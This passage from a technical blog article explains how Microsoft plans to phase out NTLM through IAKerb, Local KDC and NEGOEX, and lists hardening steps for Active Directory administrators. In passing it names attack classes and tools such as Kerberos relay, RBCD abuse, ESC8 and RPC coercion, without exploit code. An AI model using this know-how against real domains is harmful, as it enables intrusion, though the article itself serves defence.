&lt;h3&gt;IAKerb -- closing &quot;no DC line-of-sight&quot;&lt;/h3&gt;
&lt;p&gt;IAKerb stands for &lt;em&gt;Initial and Pass Through Authentication Using Kerberos V5 and the GSS-API&lt;/em&gt;. The IETF draft has a four-author list -- Benjamin Kaduk, Jim Schaad, Larry Zhu, and Jeffrey E. Altman -- and a quiet history [@draft-ietf-kitten-iakerb].&lt;/p&gt;
&lt;p&gt;The premise is simple. A client wants to authenticate to an application server with Kerberos but cannot reach a KDC -- maybe the client is behind a firewall, maybe the KDC is only reachable from the server&apos;s side of a VPN. IAKerb wraps the Kerberos &lt;code&gt;AS-REQ&lt;/code&gt; and &lt;code&gt;TGS-REQ&lt;/code&gt; messages inside GSS-API tokens and asks the application server to proxy them to a KDC that the server &lt;em&gt;can&lt;/em&gt; reach. The client never opens a direct TCP/UDP connection to a KDC; the application server acts as the carrier.&lt;/p&gt;

The honesty duty: IAKerb&apos;s IETF draft (`draft-ietf-kitten-iakerb`) was marked &quot;Dead WG Document&quot; on August 29, 2019, by Robbie Harwood [@draft-ietf-kitten-iakerb]. Harwood&apos;s note read, roughly, that IAKerb was historical at that point and the working group had no interest left. The last revision (`-03`) is from March 30, 2017, by Benjamin Kaduk. Microsoft is now reviving the protocol in 2023-2026 for Windows 11 and Windows Server 2025 -- without acknowledging the dead-WG status in its own blog posts. This is the gap between an IETF standards-track document and what a vendor ships; the article reports both [@draft-ietf-kitten-iakerb, @palko-2023-evolution].

Initial and Pass Through Authentication Using Kerberos V5 and the GSS-API. A GSS-API-wrapped Kerberos exchange in which the client cannot reach a KDC directly and the application server proxies `AS-REQ` / `TGS-REQ` on the client&apos;s behalf. Defined by `draft-ietf-kitten-iakerb` (IETF kitten WG, currently a Dead WG Document). MIT Kerberos has shipped IAKerb since 1.9 (released February 2011); Apple ships `GSS_IAKERB_MECHANISM` since macOS 10.14. Microsoft is implementing IAKerb in Windows 11 / Server 2025 [@draft-ietf-kitten-iakerb, @palko-2023-evolution, @ms-cuomo-ad2025].
&lt;h3&gt;Local KDC -- closing &quot;no domain at all&quot;&lt;/h3&gt;
&lt;p&gt;Local accounts in the machine SAM have never had a KDC. Workgroup machines have no domain at all. Both cases force NTLM today. The fix is conceptually trivial: run a tiny Kerberos KDC against the local SAM, exposed only through IAKerb-wrapped exchanges so the wire protocol is the same as the trust-traversing case [@palko-2023-evolution, @ms-cuomo-ad2025].&lt;/p&gt;
&lt;p&gt;This is the late-adopter move that surprises Linux-side practitioners. MIT Kerberos has had IAKerb since 1.9 (released February 2011). Samba has been working on a &lt;code&gt;localkdc&lt;/code&gt; for years. At FOSDEM 2025 (February 2, 2025), Alexander Bokovoy and Andreas Schneider gave a talk explicitly framed as &quot;localkdc -- a general local authentication hub&quot; [@cryptomilk-localkdc]. Schneider&apos;s companion blog post the next week summarised the work: a parallel local-authentication hub for Linux that interoperates with the IAKerb wire format Windows is now adopting [@cryptomilk-localkdc].&lt;/p&gt;

A small Kerberos Key Distribution Center process that runs against a machine&apos;s local user database (the SAM on Windows; a file or sssd on Linux) and is exposed only through IAKerb. It lets local-account authentications use Kerberos under the same Negotiate / NEGOEX wire envelope used by domain authentications -- removing one of the four reasons NTLM persisted. Shipping in Windows 11 / Server 2025 [@palko-2023-evolution, @ms-cuomo-ad2025]; parallel Linux/Samba work coordinated under the FOSDEM 2025 `localkdc` umbrella [@cryptomilk-localkdc].
&lt;h3&gt;NEGOEX -- carrying IAKerb under the existing &lt;code&gt;Negotiate&lt;/code&gt; API&lt;/h3&gt;
&lt;p&gt;You do not want to teach every application a new SSPI provider. Existing code calls &lt;code&gt;AcquireCredentialsHandle(&quot;Negotiate&quot;, ...)&lt;/code&gt;; that should keep working, and IAKerb should be one of the mechanisms &lt;code&gt;Negotiate&lt;/code&gt; is willing to pick. The piece of plumbing that makes this possible is NEGOEX: SPNEGO Extended Negotiation [@ms-negoex, @draft-zhu-negoex].&lt;/p&gt;
&lt;p&gt;NEGOEX adds a pair of meta-data messages on top of the standard SPNEGO &lt;code&gt;NegTokenInit&lt;/code&gt; / &lt;code&gt;NegTokenResp&lt;/code&gt; exchange, so that mechanisms (like IAKerb) that need a richer negotiation can ride inside the &lt;code&gt;Negotiate&lt;/code&gt; envelope. The Microsoft Open Specification &lt;code&gt;[MS-NEGOEX]&lt;/code&gt; is currently at revision 4.0 (April 23, 2024), with the original revision dated July 9, 2020 [@ms-negoex]. The expired Microsoft IETF draft &lt;code&gt;draft-zhu-negoex&lt;/code&gt; from January 2011 is the historical anchor; four Microsoft authors -- Michiko Short, Larry Zhu, Kevin Damour, and Dave McPherson -- are listed verbatim in the draft metadata [@draft-zhu-negoex].&lt;/p&gt;
&lt;p&gt;A correction is owed here. Scope notes inherited from earlier in this project cited &quot;RFC 8143&quot; as the NEGOEX standard. RFC 8143 is actually titled &quot;Using Transport Layer Security (TLS) with Network News Transfer Protocol (NNTP)&quot; and updates RFC 4642; it has nothing to do with NEGOEX [@rfc-8143]. The correct primary references for NEGOEX are &lt;code&gt;[MS-NEGOEX]&lt;/code&gt; and &lt;code&gt;draft-zhu-negoex&lt;/code&gt;, both used consistently throughout this article [@ms-negoex, @draft-zhu-negoex].&lt;/p&gt;

The SPNEGO Extended Negotiation security mechanism. Adds a meta-data exchange inside the SPNEGO envelope so that richer mechanisms (like IAKerb) can be negotiated without changing the SSPI surface. Primary sources: Microsoft Open Specification `[MS-NEGOEX]` revision 4.0 (April 2024); expired IETF draft `draft-zhu-negoex` (January 2011). Despite a common scope-doc error, RFC 8143 is *not* NEGOEX; RFC 8143 is &quot;Using TLS with NNTP&quot; [@ms-negoex, @draft-zhu-negoex, @rfc-8143].
&lt;h3&gt;Negotiate-everywhere refactor -- closing &quot;hard-coded NTLM&quot;&lt;/h3&gt;
&lt;p&gt;The last fallback case is the most prosaic: application code that calls &lt;code&gt;AcquireCredentialsHandleW(..., &quot;Ntlm&quot;, ...)&lt;/code&gt; or RPC code that asks for &lt;code&gt;RPC_C_AUTHN_WINNT&lt;/code&gt;. Both bypass &lt;code&gt;Negotiate&lt;/code&gt; and force NTLM no matter what is on the wire. The fix is editorial -- audit Windows internals, replace each hard-coded &lt;code&gt;Ntlm&lt;/code&gt; call with &lt;code&gt;Negotiate&lt;/code&gt; -- and very large in surface area. Dan Cuomo&apos;s &quot;Active Directory improvements in Windows Server 2025&quot; post summarises the Windows Server Summit 2024 session in one sentence: &quot;we have created completely new Kerberos features to minimize use of NTLM in your environments. This session explains and demonstrates IAKerb, Local KDC, IP SPN, and the roadmap to the end of NTLM&quot; [@ms-cuomo-ad2025].&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Fallback reason&lt;/th&gt;
&lt;th&gt;Closure mechanism&lt;/th&gt;
&lt;th&gt;Primary source&lt;/th&gt;
&lt;th&gt;Ship target&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;No DC line-of-sight&lt;/td&gt;
&lt;td&gt;IAKerb (GSS-wrapped Kerberos through the app server)&lt;/td&gt;
&lt;td&gt;&lt;code&gt;draft-ietf-kitten-iakerb&lt;/code&gt; (Dead WG, revived by Microsoft) [@draft-ietf-kitten-iakerb]&lt;/td&gt;
&lt;td&gt;Windows 11 / Server 2025 [@palko-2023-evolution, @ms-cuomo-ad2025]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;No domain at all (local accounts)&lt;/td&gt;
&lt;td&gt;Local KDC over IAKerb&lt;/td&gt;
&lt;td&gt;Palko 2023; Samba &lt;code&gt;localkdc&lt;/code&gt; parallel [@palko-2023-evolution]&lt;/td&gt;
&lt;td&gt;Windows 11 / Server 2025&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;No SPN&lt;/td&gt;
&lt;td&gt;IP-SPN policy under Negotiate&lt;/td&gt;
&lt;td&gt;&lt;code&gt;[MS-NEGOEX]&lt;/code&gt;; Cuomo 2024 session [@ms-negoex, @ms-cuomo-ad2025]&lt;/td&gt;
&lt;td&gt;Windows Server 2025&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Hard-coded NTLM&lt;/td&gt;
&lt;td&gt;Audit + replace &lt;code&gt;AcquireCredentialsHandle(&quot;Ntlm&quot;)&lt;/code&gt; with &lt;code&gt;Negotiate&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Palko 2023 [@palko-2023-evolution]&lt;/td&gt;
&lt;td&gt;Editorial, ongoing through Phase 2&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;

flowchart LR
    R1[No DC line-of-sight] --&amp;gt; M1[IAKerb&lt;br /&gt;draft-ietf-kitten-iakerb]
    R2[No domain at all&lt;br /&gt;local accounts] --&amp;gt; M2[Local KDC&lt;br /&gt;over IAKerb]
    R3[No SPN for target] --&amp;gt; M3[IP-SPN policy&lt;br /&gt;under Negotiate]
    R4[Hard-coded NTLM&lt;br /&gt;in app code] --&amp;gt; M4[Negotiate-everywhere&lt;br /&gt;refactor]
    M1 --&amp;gt; N[NEGOEX&lt;br /&gt;SPNEGO extension]
    M2 --&amp;gt; N
    M3 --&amp;gt; N
    N --&amp;gt; P[Negotiate SSPI&lt;br /&gt;same call sites]

sequenceDiagram
    autonumber
    participant C as Client (no KDC reach)
    participant S as Application server (KDC reach)
    participant K as KDC
    C-&amp;gt;&amp;gt;S: SPNEGO NegTokenInit with NEGOEX MetaData, mechs=[Kerberos, IAKerb]
    S--&amp;gt;&amp;gt;C: NegTokenResp, server picks IAKerb
    C-&amp;gt;&amp;gt;S: IAKerb token wrapping AS-REQ
    S-&amp;gt;&amp;gt;K: AS-REQ
    K--&amp;gt;&amp;gt;S: AS-REP
    S--&amp;gt;&amp;gt;C: IAKerb token wrapping AS-REP -&amp;gt; client now has TGT
    C-&amp;gt;&amp;gt;S: IAKerb token wrapping TGS-REQ for service ticket
    S-&amp;gt;&amp;gt;K: TGS-REQ
    K--&amp;gt;&amp;gt;S: TGS-REP (service ticket)
    S--&amp;gt;&amp;gt;C: IAKerb token wrapping TGS-REP
    Note over C,S: From now on, ordinary AP-REQ / AP-REP over Kerberos -- no NTLM needed
&lt;p&gt;What does this mean for Linux and macOS clients in a Windows domain? IAKerb is a GSS-API mechanism, and MIT&apos;s &lt;code&gt;krb5&lt;/code&gt; library shipped IAKerb in 1.9 (released February 2011) -- well before Microsoft. Apple&apos;s Heimdal-derived GSS framework has shipped &lt;code&gt;GSS_IAKERB_MECHANISM&lt;/code&gt; since macOS 10.14 (Mojave, 2018). The cross-platform interoperability story is therefore &lt;em&gt;better&lt;/em&gt; in 2026 than it has been in years: a Linux client using MIT 1.9+ or an Apple client using macOS 10.14+ can already speak IAKerb to a Windows Server 2025 Local KDC. The parallel Samba &lt;code&gt;localkdc&lt;/code&gt; effort closes the symmetric case: a Linux machine acting as the IAKerb server [@cryptomilk-localkdc].&lt;/p&gt;
&lt;p&gt;The reader who started Section 6 believing &quot;NTLM is too entrenched to remove&quot; finishes Section 6 believing something else. The entrenchment is &lt;em&gt;exactly four&lt;/em&gt; named cases, and &lt;em&gt;each one&lt;/em&gt; has been given an engineered answer. Removal is now a sequencing problem, not an architecture problem.&lt;/p&gt;
&lt;p&gt;The engineering existed by October 2023. The shipping commitment came in January 2026. What is Microsoft actually shipping, and on what schedule?&lt;/p&gt;
&lt;h2&gt;7. The Three-Phase Roadmap&lt;/h2&gt;
&lt;p&gt;January 29, 2026. The Windows IT Pro Blog publishes &quot;Advancing Windows security: Disabling NTLM by default&quot; under the byline &lt;code&gt;mariam_gewida&lt;/code&gt; [@gewida-2026-disabling]. The post documents Microsoft&apos;s published roadmap and opens with a caveat that the rest of this article works hard not to forget.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; &quot;Disabling NTLM by default does not mean completely removing NTLM from Windows yet... during phase 3, NTLM will remain present in the OS and can be explicitly re-enabled via policy if you still need it.&quot; -- mariam_gewida, &quot;Advancing Windows security: Disabling NTLM by default,&quot; Microsoft Windows IT Pro Blog, January 29, 2026 [@gewida-2026-disabling]&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The plan has three phases. They are sequenced; each phase produces the inputs the next phase needs.&lt;/p&gt;
&lt;h3&gt;Phase 1 (now) -- Audit&lt;/h3&gt;
&lt;p&gt;Phase 1 is auditing. The deliverable is enhanced NTLM logging in Windows 11 24H2 and Windows Server 2025, documented in KB 5064479 (published July 11, 2025) [@ms-kb5064479]. The new logging surface is &lt;code&gt;Applications and Services Logs &amp;gt; Microsoft &amp;gt; Windows &amp;gt; NTLM &amp;gt; Operational&lt;/code&gt;, gated by two GPOs called &quot;NTLM Enhanced Logging&quot; and &quot;Log Enhanced Domain-wide NTLM Logs.&quot; For each NTLM authentication, the event tells the administrator three things: &lt;em&gt;who&lt;/em&gt; called (the process), &lt;em&gt;why&lt;/em&gt; (the negotiated SSPI provider chose NTLM), and &lt;em&gt;where&lt;/em&gt; (the target service). The KB also names per-event warning classes for NTLMv1, MIC-less, and EPA-not-supported authentications [@ms-kb5064479].&lt;/p&gt;
&lt;p&gt;Phase 1 also closes the oldest residual: NTLMv1. Microsoft&apos;s deprecation page added an NTLM entry in June 2024 with verbatim language: &quot;All versions of NTLM, including LANMAN, NTLMv1, and NTLMv2, are no longer under active feature development and are deprecated. Use of NTLM will continue to work in the next release of Windows Server and the next annual release of Windows. Calls to NTLM should be replaced by calls to Negotiate&quot; [@ms-deprecated-features].&lt;/p&gt;
&lt;p&gt;The same row adds: &quot;NTLMv1 is removed starting in Windows 11, version 24H2 and Windows Server 2025&quot; -- the November 2024 update note [@ms-deprecated-features]. The KB 4090105 pre-24H2 NTLMv1 auditing surface (Event ID 4624 with &lt;code&gt;Package Name (NTLM only): NTLM V1&lt;/code&gt;) remains valid for legacy environments [@ms-ntlmv1-dc-audit].&lt;/p&gt;
&lt;h3&gt;Phase 2 (H2 2026) -- IAKerb + Local KDC + Negotiate-first refactor in pre-release&lt;/h3&gt;
&lt;p&gt;Phase 2 puts the engineered closures from Section 6 into pre-release. IAKerb and Local KDC ship for Windows Insiders and Server preview channels. The Negotiate-first refactor lands -- Microsoft&apos;s own subsystems audit their &lt;code&gt;AcquireCredentialsHandleW(&quot;Ntlm&quot;, ...)&lt;/code&gt; and &lt;code&gt;RPC_C_AUTHN_WINNT&lt;/code&gt; call sites and replace them with &lt;code&gt;Negotiate&lt;/code&gt; calls. Per-machine policy controls for NTLM scope make finer-grained restriction possible. IP-SPN policy lands so the &quot;no SPN&quot; case can be closed without naming every server by FQDN [@gewida-2026-disabling, @ms-cuomo-ad2025].&lt;/p&gt;
&lt;p&gt;The Microsoft outreach mechanism for Phase 2 is the &lt;code&gt;ntlm@microsoft.com&lt;/code&gt; mailbox; the January 2026 post names it explicitly as the channel for surfacing cross-forest, federated, and ISV-edge cases that need engineering help before Phase 3 [@gewida-2026-disabling].&lt;/p&gt;
&lt;h3&gt;Phase 3 (next major Windows / Windows Server release) -- Disabled by default&lt;/h3&gt;
&lt;p&gt;Phase 3 is the default-off flip. Network NTLM authentication is disabled by default in the next major Windows and Windows Server release. The disablement is a configuration, not a binary removal: NTLM remains in the OS, callable through &lt;code&gt;Negotiate&lt;/code&gt; only when a policy explicitly re-enables it for a named scope [@gewida-2026-disabling]. The Hacker News&apos; summary of the roadmap published February 2026 documents the same three-phase structure for industry-press consumption [@thn-2026-ntlm-phaseout].&lt;/p&gt;

flowchart LR
    P1[Phase 1 -- NOW&lt;br /&gt;KB 5064479 enhanced auditing&lt;br /&gt;NTLMv1 removed in 24H2 / WS2025] --&amp;gt; P2
    P2[Phase 2 -- H2 2026&lt;br /&gt;IAKerb + Local KDC pre-release&lt;br /&gt;Negotiate-first refactor&lt;br /&gt;Per-machine NTLM scope policy] --&amp;gt; P3
    P3[Phase 3 -- next major Windows&lt;br /&gt;Network NTLM disabled by default&lt;br /&gt;Re-enablement requires explicit policy]
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Phase&lt;/th&gt;
&lt;th&gt;Deliverable&lt;/th&gt;
&lt;th&gt;Date / target&lt;/th&gt;
&lt;th&gt;Prerequisite&lt;/th&gt;
&lt;th&gt;Primary&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;Phase 1&lt;/td&gt;
&lt;td&gt;Enhanced NTLM auditing&lt;/td&gt;
&lt;td&gt;KB 5064479, July 11, 2025&lt;/td&gt;
&lt;td&gt;Windows 11 24H2 / Server 2025&lt;/td&gt;
&lt;td&gt;[@ms-kb5064479]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Phase 1&lt;/td&gt;
&lt;td&gt;NTLMv1 removal&lt;/td&gt;
&lt;td&gt;Windows 11 24H2 / Server 2025, November 2024&lt;/td&gt;
&lt;td&gt;NTLM family deprecation (June 2024)&lt;/td&gt;
&lt;td&gt;[@ms-deprecated-features]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Phase 2&lt;/td&gt;
&lt;td&gt;IAKerb + Local KDC pre-release&lt;/td&gt;
&lt;td&gt;H2 2026, Windows Insider channel&lt;/td&gt;
&lt;td&gt;Phase 1 audit data identifies callers&lt;/td&gt;
&lt;td&gt;[@gewida-2026-disabling, @ms-cuomo-ad2025]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Phase 2&lt;/td&gt;
&lt;td&gt;Negotiate-first refactor of Windows subsystems&lt;/td&gt;
&lt;td&gt;H2 2026&lt;/td&gt;
&lt;td&gt;Phase 1 audit data&lt;/td&gt;
&lt;td&gt;[@palko-2023-evolution, @gewida-2026-disabling]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Phase 2&lt;/td&gt;
&lt;td&gt;IP-SPN policy for &quot;no SPN&quot; case&lt;/td&gt;
&lt;td&gt;Windows Server 2025 + flighting&lt;/td&gt;
&lt;td&gt;NEGOEX in Negotiate&lt;/td&gt;
&lt;td&gt;[@ms-cuomo-ad2025]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Phase 3&lt;/td&gt;
&lt;td&gt;Network NTLM disabled by default&lt;/td&gt;
&lt;td&gt;Next major Windows / Server release&lt;/td&gt;
&lt;td&gt;All Phase 2 features GA&lt;/td&gt;
&lt;td&gt;[@gewida-2026-disabling]&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;p&gt;Phase 3 is the first default configuration in 30 years that does not include NTLM. It is &lt;em&gt;not&lt;/em&gt; the first configuration in 30 years without authentication-relay attacks. Why not?&lt;/p&gt;
&lt;h2&gt;8. What Disabling NTLM Cannot Buy You&lt;/h2&gt;
&lt;p&gt;A blunt section. Phase 3 is real progress. It is not the end of authentication attacks on Windows. Three structural ceilings survive the transition; the article will not pretend otherwise.&lt;/p&gt;
&lt;h3&gt;Disabled is not removed&lt;/h3&gt;
&lt;p&gt;Phase 3 still ships NTLM in the OS. The default is off; the policy lockout is exactly as strong as the domain&apos;s tier-0 administrative segregation, not stronger. An attacker who reaches a domain controller with Group Policy edit rights can flip the policy and re-enable NTLM for the scope they want. The wording in the January 2026 post is precise: &quot;during phase 3, NTLM will remain present in the OS and can be explicitly re-enabled via policy if you still need it&quot; [@gewida-2026-disabling].&lt;/p&gt;
&lt;p&gt;This is the design choice Microsoft has to make, because removing NTLM binaries entirely would brick every third-party application that hard-codes &lt;code&gt;Ntlm&lt;/code&gt; and every legacy device that has not been firmware-updated since 2018. &quot;Disabled by default with policy override&quot; is the only configuration that has any chance of getting deployed.&lt;/p&gt;
&lt;h3&gt;Kerberos has its own relay class&lt;/h3&gt;
&lt;p&gt;The relay &lt;em&gt;class&lt;/em&gt; does not depend on NTLM. KrbRelay, KrbRelayUp, RBCD abuse, unconstrained-delegation abuse, S4U2Self / S4U2Proxy chains -- the entire taxonomy survives the move to Kerberos with different named primitives. Dec0ne&apos;s KrbRelayUp README, quoted at the end of Section 4, calls the class a universal no-fix local privilege escalation; the rest of the README enumerates the LDAP-signing default and the RBCD primitive that drive the post-NTLM relay surface [@gh-krbrelayup].&lt;/p&gt;
&lt;p&gt;What changes is the protocol. What does not change is that an application server that receives an authenticated message without enforcing message integrity or channel binding can be coerced into accepting an attacker-relayed authentication. The named primitives change. The class survives.&lt;/p&gt;
&lt;h3&gt;Local SAM hashes remain password-equivalent&lt;/h3&gt;
&lt;p&gt;The Local KDC reads the SAM. An attacker with SYSTEM-level access to the same machine reads the SAM too. Once they have the hash in hand, they can either feed it to a Local KDC running on a machine they control, or they can attempt offline cracking. IAKerb does not change either of those facts; what it changes is whether the &lt;em&gt;wire&lt;/em&gt; exposes the password-equivalent secret. Defence in depth -- &lt;a href=&quot;https://paragmali.com/blog/the-tpm-in-windows-one-primitive-twenty-five-years-and-the-c/&quot; rel=&quot;noopener&quot;&gt;TPM&lt;/a&gt;-backed key wrapping, Credential Guard for VBS isolation of process credentials, &lt;a href=&quot;https://paragmali.com/blog/bitlocker-on-windows-architecture-attacks-and-the-limits-of-/&quot; rel=&quot;noopener&quot;&gt;BitLocker&lt;/a&gt; for the cold-boot scenario -- remains necessary [@ms-credential-guard].&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; Phase 3 is a transition between tradeoffs, not a transition out of them. The exit from NTLM-the-protocol is not the exit from the authentication-relay class, or from the chip-layer credential class. The arc closes one specific 30-year-old attack surface and opens different conversations about the next.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;If the structural classes survive, what practical problems remain that an administrator should worry about between today and Phase 3?&lt;/p&gt;
&lt;h2&gt;9. Open Problems and the 2026-2027 Edge&lt;/h2&gt;
&lt;p&gt;Five named problems sit between Phase 1 (now) and Phase 3 GA. Each one has a primary source and a &quot;best partial result&quot; available today.&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;ESC8 field deployment of EPA on &lt;code&gt;/certsrv/&lt;/code&gt; is uneven.&lt;/strong&gt; Microsoft published KB 5005413 on July 23, 2021 with the dispositive recipe: &lt;code&gt;&amp;lt;extendedProtectionPolicy policyEnforcement=&quot;Always&quot; /&amp;gt;&lt;/code&gt; on every &lt;code&gt;/certsrv/&lt;/code&gt; virtual directory, plus disabling plain HTTP. Server 2025 hardening pushes EPA to required-by-default in many AD CS templates. Many environments are not on Server 2025 yet, and CISA&apos;s Known Exploited Vulnerabilities catalog still lists CVE-2021-36942 as actively exploited. CVE-2022-26925 (&quot;Windows LSA Spoofing Vulnerability&quot;) is the LSARPC NTLM-relay variant that emerged after the initial PetitPotam patches; it is on the same KEV list [@ms-kb5005413].&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Third-party and legacy-app hard-coded NTLM.&lt;/strong&gt; Microsoft&apos;s Negotiate-everywhere refactor covers Microsoft&apos;s own code. Independent software vendors must do the same audit for theirs. Phase 1&apos;s enhanced auditing surface (KB 5064479) is the practical instrument for identifying the callers: every NTLM authentication carries the calling process name and a reason code [@ms-kb5064479]. The post-Phase-3 default-off configuration will surface these as outages on any environment that has not run the audit first.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Cross-forest and federated IAKerb edges.&lt;/strong&gt; Single-forest IAKerb is well-defined. Multi-forest, federated, and partner-trust scenarios get implementation-defined quickly: NEGOEX has to carry IAKerb tokens through &lt;code&gt;Negotiate&lt;/code&gt; across trust boundaries where the proxying server may not be in the same forest as the KDC. Microsoft&apos;s &lt;code&gt;ntlm@microsoft.com&lt;/code&gt; outreach mailbox exists precisely to surface these edge cases before Phase 3 [@draft-ietf-kitten-iakerb, @gewida-2026-disabling].&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Linux and macOS parallel.&lt;/strong&gt; MIT Kerberos has had IAKerb since 1.9 (released February 2011). Apple ships &lt;code&gt;GSS_IAKERB_MECHANISM&lt;/code&gt; since macOS 10.14. The Samba and &lt;code&gt;localkdc&lt;/code&gt; effort from Bokovoy and Schneider (FOSDEM 2025) is the parallel open-source path: a Linux machine that can act as the IAKerb application server for a Windows client, or vice versa, under the same &lt;code&gt;Negotiate&lt;/code&gt; envelope [@cryptomilk-localkdc]. The interoperability story should be &lt;em&gt;better&lt;/em&gt; in 2026-2027 than it has been in twenty years.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Policy pressure.&lt;/strong&gt; EU NIS2 mandates cybersecurity risk-management measures for entities in critical sectors; the Cyber Resilience Act adds mandatory security requirements for products with digital elements. Both frameworks make legacy authentication a documented compliance concern. Deprecation of NTLM under Microsoft&apos;s own deprecation page (&lt;code&gt;ms-deprecated-features&lt;/code&gt;) gives a clean audit surface that did not exist before; an organisation can point to KB 5064479 audit data showing NTLM call sites with named callers and target services, and demonstrate progress on retirement [@ms-deprecated-features].The EU regulatory framing here is touched lightly because the primary texts (NIS2 Directive, Cyber Resilience Act) are extensive regulatory documents this article does not quote verbatim beyond the European Commission&apos;s official summaries. The relevant connection is operational: deprecation pages and audit logs give compliance teams an artifact for &quot;we are retiring this class of credential under a published deprecation,&quot; which is the kind of evidence regulators ask for.&lt;/p&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;All five problems converge to one question for the AD engineer reading this article: &lt;em&gt;what should I do this quarter?&lt;/em&gt;&lt;/p&gt;
&lt;h2&gt;10. What an AD Engineer Should Do This Quarter&lt;/h2&gt;
&lt;p&gt;Six numbered actions, ordered by impact. No filler, no compliance boilerplate.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; This is the prerequisite. Without Who/Why/Where data, Phase 3 surfaces breakage as outage. Enable the &quot;NTLM Enhanced Logging&quot; and &quot;Log Enhanced Domain-wide NTLM Logs&quot; GPOs on every domain controller and member server you operate. Subscribe to the &lt;code&gt;Applications and Services Logs &amp;gt; Microsoft &amp;gt; Windows &amp;gt; NTLM &amp;gt; Operational&lt;/code&gt; channel. Identify every process that initiates NTLM, the reason &lt;code&gt;Negotiate&lt;/code&gt; declined Kerberos, and the target service. Triage by call volume and criticality [@ms-kb5064479].&lt;/p&gt;
&lt;/blockquote&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; Set &lt;code&gt;LDAPClientIntegrity = 2&lt;/code&gt; and &lt;code&gt;LdapEnforceChannelBinding = 2&lt;/code&gt; on every domain controller. This closes SMB-to-LDAP relay regardless of whether the originating authentication was NTLM or Kerberos. KrbRelayUp&apos;s existence makes this &lt;em&gt;more&lt;/em&gt; urgent post-NTLM, not less: the relay class on Kerberos uses the same un-anchored LDAP target [@gh-krbrelayup].&lt;/p&gt;
&lt;/blockquote&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; The KB 5005413 recipe is verbatim: add &lt;code&gt;&amp;lt;extendedProtectionPolicy policyEnforcement=&quot;Always&quot; /&amp;gt;&lt;/code&gt; to the authentication element of the IIS virtual directory and disable plain HTTP. &lt;code&gt;/certsrv/&lt;/code&gt; is the dispositive ESC8 target. Web Enrollment proxy endpoints (&lt;code&gt;/certenroll/&lt;/code&gt;, &lt;code&gt;/adpolicyprovider_cep_kerberos/&lt;/code&gt; and similar) are the second tier. Audit every IIS authentication endpoint in the estate and confirm &lt;code&gt;policyEnforcement=&quot;Always&quot;&lt;/code&gt; is the value, not &lt;code&gt;&quot;None&quot;&lt;/code&gt; or &lt;code&gt;&quot;Partial&quot;&lt;/code&gt; [@ms-kb5005413].&lt;/p&gt;
&lt;/blockquote&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; The Print Spooler service is the single highest-impact MS-RPRN coercion surface. Disabling Spooler on every server that does not actually print closes the entire &lt;code&gt;RpcRemoteFindFirstPrinterChangeNotificationEx&lt;/code&gt; coercion class on those hosts. Microsoft&apos;s hardening guidance and the PrintNightmare disclosures (2021) made this an explicit recommendation [@gh-spoolsample].&lt;/p&gt;
&lt;/blockquote&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; Coercer&apos;s scan mode is the canonical defensive auditing tool: it inventories which RPC coercion methods a given server still answers. Run it against every server you operate, in scan mode. The output is a list of unauthenticated and authenticated coercion endpoints to either patch, disable, or compensate around. Treat unauthenticated endpoints (LSARPC, &lt;code&gt;\PIPE\lsarpc&lt;/code&gt;) as P0 [@gh-coercer].&lt;/p&gt;
&lt;/blockquote&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; Microsoft&apos;s preferred sequence: Windows Insider flighting -&amp;gt; pilot non-production NTLM-off configurations -&amp;gt; identify hard-coded &lt;code&gt;Ntlm&lt;/code&gt; SSPI calls in your in-house code -&amp;gt; stage Phase-3 rollout against your audit data. If you wait, the cut-over surfaces breakage as outage. If you audit, the cut-over is uneventful [@gewida-2026-disabling].&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The Phase 1 audit is the load-bearing piece. Action 1 produces the data that makes Actions 2-6 prioritise correctly. The following snippet sketches the audit-event query logic an administrator would express in PowerShell -- the JavaScript runs the same logic so you can think through edge cases interactively.&lt;/p&gt;
&lt;p&gt;{`
// Sketch of the triage logic an administrator would run against
